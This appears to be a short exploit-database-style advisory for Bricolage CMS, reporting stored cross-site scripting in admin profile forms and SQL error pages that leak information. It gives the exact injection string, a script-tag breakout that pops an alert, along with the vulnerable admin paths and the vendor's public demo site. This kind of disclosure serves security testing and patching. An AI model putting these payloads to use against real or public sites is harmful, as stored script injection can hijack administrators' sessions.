Bricolage version 1.x suffers from persistent cross site scripting and remote SQL injection vulnerabilities.
648f270968361f02a75713be4218de41297130fcbab5f3d51e86d905c491399c
_______ ________________ __ _____________
_______ \ _ \ \ _ \______ \ | _/_ \______ \ __ _ __
\_ __ \/ /_\ \/ /_\ \ / / |/ /| | / / ______ \ \/ \/ /
| | \/\ \_/ \ \_/ \/ /| < | | / / /_____/ \ /
|__| \_____ /\_____ /____/ |__|_ \|___| /____/ \/\_/
\/ \/ \/
-------------------------------------------------------------------------------------------------------------------------------------------------
TITLE: Bricolage CMS Admin panel Multiple stored XSS,SQL error pages
vendor: Bricolage CMS
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Download Link: http://bricolagecms.org/downloads/
Versions: 1.*.*/2*
Tested on: Windows7
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
DEMO:
A)Persistent XSS
1. http://localhost/admin/profile/output_channel/
DEMO: http://demo.bricolagecms.org/admin/profile/output_channel/
In 'Name' and 'Description' field,
POST DATA= "'-->><script>alert(0)</script>
2. http://localhost/admin/profile/source/
DEMO: http://demo.bricolagecms.org/admin/profile/source/
In 'Source Name' and 'description' field,
POST DATA= "'-->><script>alert(0)</script>
B)SQL error pages on reflected XSS/malicious char(Info Disclosure)
1. http://localhost/admin/profile/element_type/
Demo: http://demo.bricolagecms.org/admin/profile/element_type/
In 'Source Name' and 'description' field,
POST DATA= "'-->><script>alert(0)</script>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs and ShOuTZ to s1d3-3ff3cts ,crusi,s1l3n7 4ss4s1n and my
friends